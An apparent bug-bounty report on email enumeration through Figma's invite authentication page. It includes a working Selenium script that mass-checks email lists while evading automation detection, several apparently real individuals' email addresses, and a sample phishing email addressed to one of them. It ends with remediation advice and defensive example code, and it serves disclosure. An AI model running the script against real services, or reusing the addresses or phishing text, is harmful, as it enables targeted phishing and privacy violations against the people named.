User Enumeration via Authentication Flow - Email Exposure

Summary:

During this investigation, a vulnerability was identified in Figma's authentication flow that allows user enumeration based on a difference in the UI. The issue exposes corporate and institutional email addresses, including ones belonging to organizations such as Dell, the University of Massachusetts, and several large technology companies. An attacker can use it to validate employee email addresses and then launch targeted phishing campaigns. A script was also written to automate email verification against Figma, enabling mass validation of corporate addresses and filtering of registered users for further exploitation.

What is this URL and its purpose?

The URL https://www.figma.com/invites/auth is used by Figma to manage invitations and authentication for files, teams, and projects shared within the platform. When an email address is entered in the following URL:

https://www.figma.com/invites/auth?email={email}&is_not_gen_0=true&resource_type=file

and "Continue with email" is clicked, the following behavior is observed:

  • If the email exists: a button with the text "Log in" is displayed.

  • If the email does NOT exist: a button with the text "Create account" is displayed.

This difference lets an attacker mass-validate which emails are registered on Figma without authenticating, which facilitates OSINT and spear-phishing attacks. To confirm the behavior, a test was conducted with a personal email registered on Figma (juanfelipeoz.rar@gmail.com): the interface displayed the "Log in" button, confirming that the user exists on the platform. Testing with non-existent emails produced the "Create account" button, validating the vulnerability.

Examples of URLs found in Figma's authentication flow:

PoC & Repository:

To facilitate reproduction of the finding, a private GitHub repository was created with the proof-of-concept code:

  • This script automates mass email verification in Figma, enabling an attacker to efficiently filter internal Figma users and extract corporate emails for further exploitation.

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from urllib.parse import quote
import time

# Configure Selenium with ChromeDriver
options = webdriver.ChromeOptions()
options.add_argument("--headless")  # Run headless for speed
options.add_argument("--disable-gpu")
options.add_argument("--no-sandbox")

driver = webdriver.Chrome(options=options)

# Input file with the emails to check, and the output file for results
input_file = "emails.txt"
output_file = "emails_verified.txt"

# XPaths of the elements. Both point to the second button in the form:
# "Continue with email" is clicked first, and the label at that position is
# read again afterwards to get the "Log in" / "Create account" button.
continue_xpath = "/html/body/div[1]/div/div/div/div/form/button[2]"
button_xpath = "/html/body/div[1]/div/div/div/div/form/button[2]"

# Check whether an email is registered on Figma
def check_email(email):
    # URL-encode the address so characters such as "+" survive the query string
    url = f"https://www.figma.com/invites/auth?email={quote(email)}&is_not_gen_0=true&resource_type=file"
    driver.get(url)

    try:
        # Wait until the "Continue with email" button is clickable, then click it
        WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.XPATH, continue_xpath))).click()
        time.sleep(2)  # Short pause so the page finishes updating

        # Read the text of the resulting button
        button_text = driver.find_element(By.XPATH, button_xpath).text

        if "Log in" in button_text:
            return "✅ Registered"
        elif "Create account" in button_text:
            return "❌ Not registered"
        else:
            return "⚠️ Could not determine"

    except Exception as e:
        return f"❌ Error: {e}"

# Read the emails from the file (skipping blank lines) and check each one
with open(input_file, "r", encoding="utf-8") as file:
    emails = [line.strip() for line in file if line.strip()]

results = {}
for email in emails:
    status = check_email(email)
    results[email] = status
    print(f"{email} -> {status}")

    # Pause between requests to reduce the chance of automation detection
    time.sleep(3)

# Save the results to a file
with open(output_file, "w", encoding="utf-8") as file:
    for email, status in results.items():
        file.write(f"{email} -> {status}\n")

print(f"\n[✅] Verification complete. Results saved to {output_file}")

# Close the Selenium browser
driver.quit()
(Screenshot: the script running.)

Additionally, the following files have been uploaded to the report:

  • emails.txt → Contains all extracted emails, both valid and invalid test cases.

  • emails_leaked-figma.txt → Lists all discovered Figma authentication URLs.

  • emails_verified.txt → Output file showing which emails are registered or not.

  • script_emails.py → The Python script used for scraping and verification.

  • requirements.txt → Dependencies needed to run the script.

Steps To Reproduce:

  1. Go to the following URL in your browser, replacing {email} with the target email address:

https://www.figma.com/invites/auth?email={email}&is_not_gen_0=true&resource_type=file

  2. Click "Continue with email" and observe the response:

    • If the email exists: a "Log in" button appears.

    • If the email does NOT exist: a "Create account" button appears.

  3. Automate this process with the provided script_emails.py to verify multiple emails at scale.

Impact

Exposure of Corporate & Institutional Emails

  • Emails from major organizations, such as Dell (mark.zabala@dell.com), the University of Massachusetts (lejones@umass.edu), and other large technology companies, are exposed.

  • Attackers can build verified email lists for further exploitation.

Reputation & Trust Risks, Cross-Referencing Breaches

  • Figma’s security reputation is at stake. Users may perceive the platform as insecure, leading to significant trust erosion.

  • Loss of customer confidence. Organizations using Figma for design collaboration might reconsider their trust in the platform, fearing exposure of their employees’ emails.

  • Exposed emails can be cross-referenced against https://haveibeenpwned.com/ to find previous breaches, and any leaked credentials reused in follow-on attacks.

Facilitation of Targeted Phishing Attacks

  • An attacker can confirm which employees use Figma and send them tailored phishing emails.

Example phishing email:

From: security@figma.com
To: lejones@umass.edu
Subject: [ALERT] Suspicious activity detected in your Figma account

Dear User,

We detected an unauthorized login attempt to your Figma account. Please verify your identity:
[Malicious link disguised as Figma]

Regards,
Figma Security Team.

Recommendations

  • Return the same response regardless of whether the address is registered, instead of differentiating "Log in" vs. "Create account" (for example, always show a single "Continue" button and deliver the login or sign-up link by email). The response must match in status code, body, and rendered UI, and both code paths should take comparable time, otherwise the difference simply moves to another channel.

  • Implement per-IP and per-address rate limiting on this endpoint to prevent automated lookups.

  • Avoid placing the raw email in the URL. Note that encrypting or hashing it alone does not close the oracle, since the attacker controls the input and observes the result; the response must be uniform first.

  • Add a CAPTCHA after repeated lookups from the same source.
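The following is an added example, not Figma's code, that models the "Continue with email" step: the observed oracle beside a hardened handler that returns a byte-identical response for registered and unregistered addresses, moves the login-vs-signup decision into an out-of-band email, and applies a per-client sliding-window limit with a CAPTCHA requirement once it trips. The account store, addresses, client IPs, and limiter design are all constructed for the example; `is_enumeration_oracle` is the regression check a developer would keep in the test suite so the difference cannot return.

```python
import time
from collections import defaultdict, deque

# Constructed sample account store; the addresses are hypothetical.
REGISTERED = {"alice@example.com", "bob@example.org"}


def vulnerable_next_step(email):
    """Models the observed behaviour: the button label reveals whether the
    address is registered, so the response itself is the oracle."""
    if email.strip().lower() in REGISTERED:
        return {"status": 200, "button": "Log in"}
    return {"status": 200, "button": "Create account"}


class SlidingWindowLimiter:
    """Per-key sliding-window counter (assumed design, not Figma's)."""

    def __init__(self, max_requests, window_seconds):
        self.max_requests = max_requests
        self.window_seconds = window_seconds
        self._hits = defaultdict(deque)

    def allow(self, key, now=None):
        now = time.monotonic() if now is None else now
        hits = self._hits[key]
        # Drop timestamps that have aged out of the window.
        while hits and now - hits[0] >= self.window_seconds:
            hits.popleft()
        if len(hits) >= self.max_requests:
            return False
        hits.append(now)
        return True


# Out-of-band mail queue: the only place where the two branches may differ.
OUTBOX = []

UNIFORM_OK = {
    "status": 200,
    "button": "Continue",
    "message": "If this address can receive mail, we sent you a link to continue.",
}
UNIFORM_BLOCKED = {
    "status": 429,
    "captcha_required": True,
    "message": "Too many requests. Complete the CAPTCHA and try again.",
}


def hardened_next_step(email, client_ip, limiter, now=None):
    """Hardened handler: identical public response for known and unknown
    addresses; the login-vs-signup choice is delivered only by email."""
    if not limiter.allow(client_ip, now):
        return dict(UNIFORM_BLOCKED)
    normalized = email.strip().lower()
    # Both branches do the same work (one lookup, one enqueue) so response
    # time does not become a replacement oracle.
    template = "login_link" if normalized in REGISTERED else "signup_link"
    OUTBOX.append({"to": normalized, "template": template})
    return dict(UNIFORM_OK)


def is_enumeration_oracle(handler, known_email, unknown_email):
    """Regression check: True when the public response distinguishes a
    registered address from an unregistered one."""
    return handler(known_email) != handler(unknown_email)


if __name__ == "__main__":
    print("vulnerable oracle:", is_enumeration_oracle(
        vulnerable_next_step, "alice@example.com", "nobody@example.net"))
    limiter = SlidingWindowLimiter(max_requests=5, window_seconds=60)
    hardened = lambda e: hardened_next_step(e, "203.0.113.7", limiter, now=0.0)
    print("hardened oracle:", is_enumeration_oracle(
        hardened, "alice@example.com", "nobody@example.net"))
    for _ in range(3):
        hardened("carol@example.net")
    # Sixth request in the window from the same client trips the limiter.
    print("sixth request:", hardened("dave@example.net"))
```

The check compares whole response dictionaries, so any new field that differs between branches (a redirect target, a hidden form value, a cookie) fails the test immediately. Timing is not covered by a dictionary comparison; in a real deployment, measure both paths under load as well, since a database miss and a hit can differ enough to be distinguishable.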

Conclusion

  • This vulnerability enables unauthorized user enumeration, exposing corporate emails and enabling phishing attacks. Immediate remediation is recommended to prevent exploitation and protect user privacy.
